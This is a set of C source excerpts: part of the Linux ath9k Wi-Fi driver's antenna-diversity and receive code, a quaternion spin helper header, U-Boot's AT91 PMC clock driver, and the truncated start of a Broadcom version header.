				antcomb->second_ratio = true;
			else
				antcomb->second_ratio = false;
		} else if (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2) {
			if (ath_is_alt_ant_ratio_better(alt_ratio,
						ATH_ANT_DIV_COMB_LNA1_DELTA_MID,
						ATH_ANT_DIV_COMB_LNA1_DELTA_LOW,
						main_rssi_avg, alt_rssi_avg,
						antcomb->total_pkt_count))
				antcomb->second_ratio = true;
			else
				antcomb->second_ratio = false;
		} else {
			if ((((alt_ratio >= ATH_ANT_DIV_COMB_ALT_ANT_RATIO2) &&
			    (alt_rssi_avg > main_rssi_avg +
			    ATH_ANT_DIV_COMB_LNA1_DELTA_HI)) ||
			    (alt_rssi_avg > main_rssi_avg)) &&
			    (antcomb->total_pkt_count > 50))
				antcomb->second_ratio = true;
			else
				antcomb->second_ratio = false;
		}

		/* set alt to the conf with maximun ratio */
		if (antcomb->first_ratio && antcomb->second_ratio) {
			if (antcomb->rssi_second > antcomb->rssi_third) {
				/* first alt*/
				if ((antcomb->first_quick_scan_conf ==
				    ATH_ANT_DIV_COMB_LNA1) ||
				    (antcomb->first_quick_scan_conf ==
				    ATH_ANT_DIV_COMB_LNA2))
					/* Set alt LNA1 or LNA2*/
					if (div_ant_conf->main_lna_conf ==
					    ATH_ANT_DIV_COMB_LNA2)
						div_ant_conf->alt_lna_conf =
							ATH_ANT_DIV_COMB_LNA1;
					else
						div_ant_conf->alt_lna_conf =
							ATH_ANT_DIV_COMB_LNA2;
				else
					/* Set alt to A+B or A-B */
					div_ant_conf->alt_lna_conf =
						antcomb->first_quick_scan_conf;
			} else if ((antcomb->second_quick_scan_conf ==
				   ATH_ANT_DIV_COMB_LNA1) ||
				   (antcomb->second_quick_scan_conf ==
				   ATH_ANT_DIV_COMB_LNA2)) {
				/* Set alt LNA1 or LNA2 */
				if (div_ant_conf->main_lna_conf ==
				    ATH_ANT_DIV_COMB_LNA2)
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA1;
				else
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA2;
			} else {
				/* Set alt to A+B or A-B */
				div_ant_conf->alt_lna_conf =
					antcomb->second_quick_scan_conf;
			}
		} else if (antcomb->first_ratio) {
			/* first alt */
			if ((antcomb->first_quick_scan_conf ==
			    ATH_ANT_DIV_COMB_LNA1) ||
			    (antcomb->first_quick_scan_conf ==
			    ATH_ANT_DIV_COMB_LNA2))
				/* Set alt LNA1 or LNA2 */
				if (div_ant_conf->main_lna_conf ==
				    ATH_ANT_DIV_COMB_LNA2)
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA1;
				else
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA2;
			else
				/* Set alt to A+B or A-B */
				div_ant_conf->alt_lna_conf =
					antcomb->first_quick_scan_conf;
		} else if (antcomb->second_ratio) {
			/* second alt */
			if ((antcomb->second_quick_scan_conf ==
			    ATH_ANT_DIV_COMB_LNA1) ||
			    (antcomb->second_quick_scan_conf ==
			    ATH_ANT_DIV_COMB_LNA2))
				/* Set alt LNA1 or LNA2 */
				if (div_ant_conf->main_lna_conf ==
				    ATH_ANT_DIV_COMB_LNA2)
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA1;
				else
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA2;
			else
				/* Set alt to A+B or A-B */
				div_ant_conf->alt_lna_conf =
					antcomb->second_quick_scan_conf;
		} else {
			/* main is largest */
			if ((antcomb->main_conf == ATH_ANT_DIV_COMB_LNA1) ||
			    (antcomb->main_conf == ATH_ANT_DIV_COMB_LNA2))
				/* Set alt LNA1 or LNA2 */
				if (div_ant_conf->main_lna_conf ==
				    ATH_ANT_DIV_COMB_LNA2)
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA1;
				else
					div_ant_conf->alt_lna_conf =
						ATH_ANT_DIV_COMB_LNA2;
			else
				/* Set alt to A+B or A-B */
				div_ant_conf->alt_lna_conf =
					antcomb->main_conf;
		}
		break;
	default:
		break;
	}
}

static void ath_ant_div_conf_fast_divbias(struct ath_hw_antcomb_conf *ant_conf,
struct ath_ant_comb *antcomb, int alt_ratio) { if (ant_conf->div_group == 0) { /* Adjust the fast_div_bias based on main and alt lna conf */ switch ((ant_conf->main_lna_conf << 4) | ant_conf->alt_lna_conf) { case 0x01: /* A-B LNA2 */ ant_conf->fast_div_bias = 0x3b; break; case 0x02: /* A-B LNA1 */ ant_conf->fast_div_bias = 0x3d; break; case 0x03: /* A-B A+B */ ant_conf->fast_div_bias = 0x1; break; case 0x10: /* LNA2 A-B */ ant_conf->fast_div_bias = 0x7; break; case 0x12: /* LNA2 LNA1 */ ant_conf->fast_div_bias = 0x2; break; case 0x13: /* LNA2 A+B */ ant_conf->fast_div_bias = 0x7; break; case 0x20: /* LNA1 A-B */ ant_conf->fast_div_bias = 0x6; break; case 0x21: /* LNA1 LNA2 */ ant_conf->fast_div_bias = 0x0; break; case 0x23: /* LNA1 A+B */ ant_conf->fast_div_bias = 0x6; break; case 0x30: /* A+B A-B */ ant_conf->fast_div_bias = 0x1; break; case 0x31: /* A+B LNA2 */ ant_conf->fast_div_bias = 0x3b; break; case 0x32: /* A+B LNA1 */ ant_conf->fast_div_bias = 0x3d; break; default: break; } } else if (ant_conf->div_group == 1) { /* Adjust the fast_div_bias based on main and alt_lna_conf */ switch ((ant_conf->main_lna_conf << 4) | ant_conf->alt_lna_conf) { case 0x01: /* A-B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x02: /* A-B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x03: /* A-B A+B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x10: /* LNA2 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x12: /* LNA2 LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x13: /* LNA2 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else 
ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x20: /* LNA1 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x21: /* LNA1 LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x23: /* LNA1 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x3f; else ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x30: /* A+B A-B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x31: /* A+B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x32: /* A+B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; default: break; } } else if (ant_conf->div_group == 2) { /* Adjust the fast_div_bias based on main and alt_lna_conf */ switch ((ant_conf->main_lna_conf << 4) | ant_conf->alt_lna_conf) { case 0x01: /* A-B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x02: /* A-B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x03: /* A-B A+B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x10: /* LNA2 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x12: /* LNA2 LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x13: /* LNA2 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) 
ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x20: /* LNA1 A-B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x21: /* LNA1 LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x23: /* LNA1 A+B */ if (!(antcomb->scan) && (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO)) ant_conf->fast_div_bias = 0x1; else ant_conf->fast_div_bias = 0x2; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x30: /* A+B A-B */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x31: /* A+B LNA2 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; case 0x32: /* A+B LNA1 */ ant_conf->fast_div_bias = 0x1; ant_conf->main_gaintb = 0; ant_conf->alt_gaintb = 0; break; default: break; } } } /* Antenna diversity and combining */ static void ath_ant_comb_scan(struct ath_softc *sc, struct ath_rx_status *rs) { struct ath_hw_antcomb_conf div_ant_conf; struct ath_ant_comb *antcomb = &sc->ant_comb; int alt_ratio = 0, alt_rssi_avg = 0, main_rssi_avg = 0, curr_alt_set; int curr_main_set; int main_rssi = rs->rs_rssi_ctl0; int alt_rssi = rs->rs_rssi_ctl1; int rx_ant_conf, main_ant_conf; bool short_scan = false; rx_ant_conf = (rs->rs_rssi_ctl2 >> ATH_ANT_RX_CURRENT_SHIFT) & ATH_ANT_RX_MASK; main_ant_conf = (rs->rs_rssi_ctl2 >> ATH_ANT_RX_MAIN_SHIFT) & ATH_ANT_RX_MASK; /* Record packet only when both main_rssi and alt_rssi is positive */ if (main_rssi > 0 && alt_rssi > 0) { antcomb->total_pkt_count++; antcomb->main_total_rssi += main_rssi; antcomb->alt_total_rssi += alt_rssi; if (main_ant_conf == rx_ant_conf) antcomb->main_recv_cnt++; else antcomb->alt_recv_cnt++; } /* Short scan check */ if (antcomb->scan && 
antcomb->alt_good) { if (time_after(jiffies, antcomb->scan_start_time + msecs_to_jiffies(ATH_ANT_DIV_COMB_SHORT_SCAN_INTR))) short_scan = true; else if (antcomb->total_pkt_count == ATH_ANT_DIV_COMB_SHORT_SCAN_PKTCOUNT) { alt_ratio = ((antcomb->alt_recv_cnt * 100) / antcomb->total_pkt_count); if (alt_ratio < ATH_ANT_DIV_COMB_ALT_ANT_RATIO) short_scan = true; } } if (((antcomb->total_pkt_count < ATH_ANT_DIV_COMB_MAX_PKTCOUNT) || rs->rs_moreaggr) && !short_scan) return; if (antcomb->total_pkt_count) { alt_ratio = ((antcomb->alt_recv_cnt * 100) / antcomb->total_pkt_count); main_rssi_avg = (antcomb->main_total_rssi / antcomb->total_pkt_count); alt_rssi_avg = (antcomb->alt_total_rssi / antcomb->total_pkt_count); } ath9k_hw_antdiv_comb_conf_get(sc->sc_ah, &div_ant_conf); curr_alt_set = div_ant_conf.alt_lna_conf; curr_main_set = div_ant_conf.main_lna_conf; antcomb->count++; if (antcomb->count == ATH_ANT_DIV_COMB_MAX_COUNT) { if (alt_ratio > ATH_ANT_DIV_COMB_ALT_ANT_RATIO) { ath_lnaconf_alt_good_scan(antcomb, div_ant_conf, main_rssi_avg); antcomb->alt_good = true; } else { antcomb->alt_good = false; } antcomb->count = 0; antcomb->scan = true; antcomb->scan_not_start = true; } if (!antcomb->scan) { if (ath_ant_div_comb_alt_check(div_ant_conf.div_group, alt_ratio, curr_main_set, curr_alt_set, alt_rssi_avg, main_rssi_avg)) { if (curr_alt_set == ATH_ANT_DIV_COMB_LNA2) { /* Switch main and alt LNA */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; } else if (curr_alt_set == ATH_ANT_DIV_COMB_LNA1) { div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } goto div_comb_done; } else if ((curr_alt_set != ATH_ANT_DIV_COMB_LNA1) && (curr_alt_set != ATH_ANT_DIV_COMB_LNA2)) { /* Set alt to another LNA */ if (curr_main_set == ATH_ANT_DIV_COMB_LNA2) div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; else if (curr_main_set == ATH_ANT_DIV_COMB_LNA1) div_ant_conf.alt_lna_conf = 
ATH_ANT_DIV_COMB_LNA2; goto div_comb_done; } if ((alt_rssi_avg < (main_rssi_avg + div_ant_conf.lna1_lna2_delta))) goto div_comb_done; } if (!antcomb->scan_not_start) { switch (curr_alt_set) { case ATH_ANT_DIV_COMB_LNA2: antcomb->rssi_lna2 = alt_rssi_avg; antcomb->rssi_lna1 = main_rssi_avg; antcomb->scan = true; /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; break; case ATH_ANT_DIV_COMB_LNA1: antcomb->rssi_lna1 = alt_rssi_avg; antcomb->rssi_lna2 = main_rssi_avg; antcomb->scan = true; /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; break; case ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2: antcomb->rssi_add = alt_rssi_avg; antcomb->scan = true; /* set to A-B */ div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; break; case ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2: antcomb->rssi_sub = alt_rssi_avg; antcomb->scan = false; if (antcomb->rssi_lna2 > (antcomb->rssi_lna1 + ATH_ANT_DIV_COMB_LNA1_LNA2_SWITCH_DELTA)) { /* use LNA2 as main LNA */ if ((antcomb->rssi_add > antcomb->rssi_lna1) && (antcomb->rssi_add > antcomb->rssi_sub)) { /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; } else if (antcomb->rssi_sub > antcomb->rssi_lna1) { /* set to A-B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; } else { /* set to LNA1 */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; } } else { /* use LNA1 as main LNA */ if ((antcomb->rssi_add > antcomb->rssi_lna2) && (antcomb->rssi_add > antcomb->rssi_sub)) { /* set to A+B */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_PLUS_LNA2; } else if (antcomb->rssi_sub > antcomb->rssi_lna1) { /* set to A-B */ div_ant_conf.main_lna_conf = 
ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1_MINUS_LNA2; } else { /* set to LNA2 */ div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } } break; default: break; } } else { if (!antcomb->alt_good) { antcomb->scan_not_start = false; /* Set alt to another LNA */ if (curr_main_set == ATH_ANT_DIV_COMB_LNA2) { div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA2; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA1; } else if (curr_main_set == ATH_ANT_DIV_COMB_LNA1) { div_ant_conf.main_lna_conf = ATH_ANT_DIV_COMB_LNA1; div_ant_conf.alt_lna_conf = ATH_ANT_DIV_COMB_LNA2; } goto div_comb_done; } } ath_select_ant_div_from_quick_scan(antcomb, &div_ant_conf, main_rssi_avg, alt_rssi_avg, alt_ratio); antcomb->quick_scan_cnt++; div_comb_done: ath_ant_div_conf_fast_divbias(&div_ant_conf, antcomb, alt_ratio); ath9k_hw_antdiv_comb_conf_set(sc->sc_ah, &div_ant_conf); antcomb->scan_start_time = jiffies; antcomb->total_pkt_count = 0; antcomb->main_total_rssi = 0; antcomb->alt_total_rssi = 0; antcomb->main_recv_cnt = 0; antcomb->alt_recv_cnt = 0; } int ath_rx_tasklet(struct ath_softc *sc, int flush, bool hp) { struct ath_buf *bf; struct sk_buff *skb = NULL, *requeue_skb, *hdr_skb; struct ieee80211_rx_status *rxs; struct ath_hw *ah = sc->sc_ah; struct ath_common *common = ath9k_hw_common(ah); struct ieee80211_hw *hw = sc->hw; struct ieee80211_hdr *hdr; int retval; bool decrypt_error = false; struct ath_rx_status rs; enum ath9k_rx_qtype qtype; bool edma = !!(ah->caps.hw_caps & ATH9K_HW_CAP_EDMA); int dma_type; u8 rx_status_len = ah->caps.rx_status_len; u64 tsf = 0; u32 tsf_lower = 0; unsigned long flags; if (edma) dma_type = DMA_BIDIRECTIONAL; else dma_type = DMA_FROM_DEVICE; qtype = hp ? 
ATH9K_RX_QUEUE_HP : ATH9K_RX_QUEUE_LP; spin_lock_bh(&sc->rx.rxbuflock); tsf = ath9k_hw_gettsf64(ah); tsf_lower = tsf & 0xffffffff; do { /* If handling rx interrupt and flush is in progress => exit */ if ((sc->sc_flags & SC_OP_RXFLUSH) && (flush == 0)) break; memset(&rs, 0, sizeof(rs)); if (edma) bf = ath_edma_get_next_rx_buf(sc, &rs, qtype); else bf = ath_get_next_rx_buf(sc, &rs); if (!bf) break; skb = bf->bf_mpdu; if (!skb) continue; /* * Take frame header from the first fragment and RX status from * the last one. */ if (sc->rx.frag) hdr_skb = sc->rx.frag; else hdr_skb = skb; hdr = (struct ieee80211_hdr *) (hdr_skb->data + rx_status_len); rxs = IEEE80211_SKB_RXCB(hdr_skb); if (ieee80211_is_beacon(hdr->frame_control) && !is_zero_ether_addr(common->curbssid) && !compare_ether_addr(hdr->addr3, common->curbssid)) rs.is_mybeacon = true; else rs.is_mybeacon = false; ath_debug_stat_rx(sc, &rs); /* * If we're asked to flush receive queue, directly * chain it back at the queue without processing it. */ if (sc->sc_flags & SC_OP_RXFLUSH) goto requeue_drop_frag; memset(rxs, 0, sizeof(struct ieee80211_rx_status)); rxs->mactime = (tsf & ~0xffffffffULL) | rs.rs_tstamp; if (rs.rs_tstamp > tsf_lower && unlikely(rs.rs_tstamp - tsf_lower > 0x10000000)) rxs->mactime -= 0x100000000ULL; if (rs.rs_tstamp < tsf_lower && unlikely(tsf_lower - rs.rs_tstamp > 0x10000000)) rxs->mactime += 0x100000000ULL; retval = ath9k_rx_skb_preprocess(common, hw, hdr, &rs, rxs, &decrypt_error); if (retval) goto requeue_drop_frag; /* Ensure we always have an skb to requeue once we are done * processing the current buffer's skb */ requeue_skb = ath_rxbuf_alloc(common, common->rx_bufsize, GFP_ATOMIC); /* If there is no memory we ignore the current RX'd frame, * tell hardware it can give us a new frame using the old * skb and put it at the tail of the sc->rx.rxbuf list for * processing. 
*/ if (!requeue_skb) goto requeue_drop_frag; /* Unmap the frame */ dma_unmap_single(sc->dev, bf->bf_buf_addr, common->rx_bufsize, dma_type); skb_put(skb, rs.rs_datalen + ah->caps.rx_status_len); if (ah->caps.rx_status_len) skb_pull(skb, ah->caps.rx_status_len); if (!rs.rs_more) ath9k_rx_skb_postprocess(common, hdr_skb, &rs, rxs, decrypt_error); /* We will now give hardware our shiny new allocated skb */ bf->bf_mpdu = requeue_skb; bf->bf_buf_addr = dma_map_single(sc->dev, requeue_skb->data, common->rx_bufsize, dma_type); if (unlikely(dma_mapping_error(sc->dev, bf->bf_buf_addr))) { dev_kfree_skb_any(requeue_skb); bf->bf_mpdu = NULL; bf->bf_buf_addr = 0; ath_err(common, "dma_mapping_error() on RX\n"); ieee80211_rx(hw, skb); break; } if (rs.rs_more) { /* * rs_more indicates chained descriptors which can be * used to link buffers together for a sort of * scatter-gather operation. */ if (sc->rx.frag) { /* too many fragments - cannot handle frame */ dev_kfree_skb_any(sc->rx.frag); dev_kfree_skb_any(skb); skb = NULL; } sc->rx.frag = skb; goto requeue; } if (sc->rx.frag) { int space = skb->len - skb_tailroom(hdr_skb); if (pskb_expand_head(hdr_skb, 0, space, GFP_ATOMIC) < 0) { dev_kfree_skb(skb); goto requeue_drop_frag; } sc->rx.frag = NULL; skb_copy_from_linear_data(skb, skb_put(hdr_skb, skb->len), skb->len); dev_kfree_skb_any(skb); skb = hdr_skb; } if (ah->caps.hw_caps & ATH9K_HW_CAP_ANT_DIV_COMB) { /* * change the default rx antenna if rx diversity * chooses the other antenna 3 times in a row. 
*/ if (sc->rx.defant != rs.rs_antenna) { if (++sc->rx.rxotherant >= 3) ath_setdefantenna(sc, rs.rs_antenna); } else { sc->rx.rxotherant = 0; } } if (rxs->flag & RX_FLAG_MMIC_STRIPPED) skb_trim(skb, skb->len - 8); spin_lock_irqsave(&sc->sc_pm_lock, flags); if ((sc->ps_flags & (PS_WAIT_FOR_BEACON | PS_WAIT_FOR_CAB | PS_WAIT_FOR_PSPOLL_DATA)) || ath9k_check_auto_sleep(sc)) ath_rx_ps(sc, skb, rs.is_mybeacon); spin_unlock_irqrestore(&sc->sc_pm_lock, flags); if ((ah->caps.hw_caps & ATH9K_HW_CAP_ANT_DIV_COMB) && sc->ant_rx == 3) ath_ant_comb_scan(sc, &rs); ieee80211_rx(hw, skb); requeue_drop_frag: if (sc->rx.frag) { dev_kfree_skb_any(sc->rx.frag); sc->rx.frag = NULL; } requeue: if (edma) { list_add_tail(&bf->list, &sc->rx.rxbuf); ath_rx_edma_buf_link(sc, qtype); } else { list_move_tail(&bf->list, &sc->rx.rxbuf); ath_rx_buf_link(sc, bf); if (!flush) ath9k_hw_rxena(ah); } } while (1); spin_unlock_bh(&sc->rx.rxbuflock); if (!(ah->imask & ATH9K_INT_RXEOL)) { ah->imask |= (ATH9K_INT_RXEOL | ATH9K_INT_RXORN); ath9k_hw_set_interrupts(ah); } return 0; }
{ "language": "C" }
#ifndef ARBITRARY_SPIN_H__
#define ARBITRARY_SPIN_H__

#include <math.h>
#include "quat.h"	/* union quat - project-local quaternion type */

/* Sizes of the precomputed pools below. */
#define NRANDOM_ORIENTATIONS 20
#define NRANDOM_SPINS 20

/* Pools of precomputed random orientations and angular-velocity
 * ("spin") quaternions, filled in by
 * initialize_random_orientations_and_spins(). */
extern union quat random_orientation[NRANDOM_ORIENTATIONS];
extern union quat random_spin[NRANDOM_SPINS];

/* Populate random_orientation[] and random_spin[] from the given seed
 * (mtwist_seed presumably seeds a Mersenne-Twister PRNG, per the name --
 * confirm in the .c file).  Callers that use the same seed get the same
 * tables. */
extern void initialize_random_orientations_and_spins(int mtwist_seed);

/* Derive an orientation for a spinning object at the given timestamp.
 * NOTE(review): in/out roles are not visible from this header; it looks
 * like *rotational_velocity is the per-frame spin and *orientation the
 * result at `timestamp` for a simulation running at frame_rate_hz --
 * verify against the implementation before relying on this. */
extern void compute_arbitrary_spin(float frame_rate_hz, double timestamp,
				union quat *orientation, union quat *rotational_velocity);

#endif
{ "language": "C" }
/*
 * Copyright (C) 2016 Atmel Corporation
 *		      Wenyou.Yang <wenyou.yang@atmel.com>
 *
 * SPDX-License-Identifier:	GPL-2.0+
 */

/*
 * AT91 PMC (Power Management Controller) clock-driver glue.
 *
 * The PMC device-tree node is bound as a simple bus; the helpers below
 * are shared by the individual AT91 clock drivers (see "pmc.h") to
 * locate the PMC register block and to bind/translate clock sub-nodes.
 */

#include <common.h>
#include <clk-uclass.h>
#include <dm.h>
#include <dm/lists.h>
#include <dm/util.h>
#include "pmc.h"

DECLARE_GLOBAL_DATA_PTR;

/* Device-tree compatibles handled by the PMC bus driver. */
static const struct udevice_id at91_pmc_match[] = {
	{ .compatible = "atmel,at91rm9200-pmc" },
	{ .compatible = "atmel,at91sam9260-pmc" },
	{ .compatible = "atmel,at91sam9g45-pmc" },
	{ .compatible = "atmel,at91sam9n12-pmc" },
	{ .compatible = "atmel,at91sam9x5-pmc" },
	{ .compatible = "atmel,sama5d3-pmc" },
	{ .compatible = "atmel,sama5d2-pmc" },
	{}
};

/* The PMC node itself only acts as a container for the clock nodes. */
U_BOOT_DRIVER(at91_pmc) = {
	.name = "at91-pmc",
	.id = UCLASS_SIMPLE_BUS,
	.of_match = at91_pmc_match,
};

/*---------------------------------------------------------*/

/*
 * Probe helper for "core" clocks that sit directly under the PMC node:
 * record the *parent* device's register address (i.e. the PMC register
 * block) in this device's platdata.  Always returns 0.
 */
int at91_pmc_core_probe(struct udevice *dev)
{
	struct pmc_platdata *plat = dev_get_platdata(dev);

	/* The PMC registers belong to the parent (the PMC node). */
	dev = dev_get_parent(dev);

	plat->reg_base = (struct at91_pmc *)devfdt_get_addr_ptr(dev);

	return 0;
}

/**
 * at91_clk_sub_device_bind() - bind the clock sub-nodes of @dev
 * @dev:      parent clock device whose DT sub-nodes are scanned
 * @drv_name: name of the driver to bind each clock sub-node to
 *
 * Recursively bind its children as clk devices.  Sub-nodes that carry a
 * "compatible" property are normal devices handled elsewhere and are
 * skipped; before relocation, nodes not marked for pre-relocation use
 * are skipped as well.
 *
 * @return: 0 on success, or negative error code on failure
 */
int at91_clk_sub_device_bind(struct udevice *dev, const char *drv_name)
{
	const void *fdt = gd->fdt_blob;
	int offset = dev_of_offset(dev);
	/* Before relocation only bind nodes needed that early. */
	bool pre_reloc_only = !(gd->flags & GD_FLG_RELOC);
	const char *name;
	int ret;

	for (offset = fdt_first_subnode(fdt, offset);
	     offset > 0;
	     offset = fdt_next_subnode(fdt, offset)) {
		if (pre_reloc_only && !dm_fdt_pre_reloc(fdt, offset))
			continue;
		/*
		 * If this node has "compatible" property, this is not
		 * a clock sub-node, but a normal device. skip.
		 */
		/*
		 * fdt_get_property() stores the property length in
		 * *lenp (here: ret) on success, or a -FDT_ERR_* code
		 * when the property is absent, so ret >= 0 means the
		 * property exists.
		 */
		fdt_get_property(fdt, offset, "compatible", &ret);
		if (ret >= 0)
			continue;

		/* Anything other than "not found" is a real FDT error. */
		if (ret != -FDT_ERR_NOTFOUND)
			return ret;

		name = fdt_get_name(fdt, offset, NULL);
		if (!name)
			return -EINVAL;

		ret = device_bind_driver_to_node(dev, drv_name, name, offset_to_ofnode(offset), NULL);
		if (ret)
			return ret;
	}

	return 0;
}

/*
 * Translate a DT clock specifier into a clk->id.  These clocks take no
 * specifier cells (#clock-cells = 0 style); the clock id comes from the
 * node's own "reg" property instead.  Returns 0 on success, -EINVAL on
 * a non-empty specifier or a missing/negative "reg".
 */
int at91_clk_of_xlate(struct clk *clk, struct ofnode_phandle_args *args)
{
	int periph;

	if (args->args_count) {
		debug("Invalid args_count: %d\n", args->args_count);
		return -EINVAL;
	}

	periph = fdtdec_get_uint(gd->fdt_blob, dev_of_offset(clk->dev), "reg", -1);
	if (periph < 0)
		return -EINVAL;

	clk->id = periph;

	return 0;
}

/*
 * Probe helper for clocks nested one level deeper than the PMC
 * (pmc -> peripheral container -> clock): fetch the PMC register base
 * from the grandparent device.  Always returns 0.
 */
int at91_clk_probe(struct udevice *dev)
{
	struct udevice *dev_periph_container, *dev_pmc;
	struct pmc_platdata *plat = dev_get_platdata(dev);

	dev_periph_container = dev_get_parent(dev);
	dev_pmc = dev_get_parent(dev_periph_container);

	plat->reg_base = (struct at91_pmc *)devfdt_get_addr_ptr(dev_pmc);

	return 0;
}
{ "language": "C" }
/*
 * Copyright (C) 1999-2012, Broadcom Corporation
 *
 * Unless you and Broadcom execute a separate written software license
 * agreement governing use of this software, this software is licensed to you
 * under the terms of the GNU General Public License version 2 (the "GPL"),
 * available at http://www.broadcom.com/licenses/GPLv2.php, with the
 * following added to such license:
 *
 * As a special exception, the copyright holders of this software give you
 * permission to link this software with independent modules, and to copy and
 * distribute the resulting executable under terms of your choice, provided that
 * you also meet, for each linked independent module, the terms and conditions of
 * the license of that module. An independent module is a module which is not
 * derived from this software. The special exception does not apply to any
 * modifications of the software.
 *
 * Notwithstanding the above, under no circumstances may you combine this
 * software in any way with any other Broadcom software provided under a license
 * other than the GPL, without Broadcom's express prior written consent.
 *
 * $Id: epivers.h.in,v 13.33 2010-09-08 22:08:53 $
 *
 */

/*
 * Version stamp for the Broadcom wireless driver, identifying release
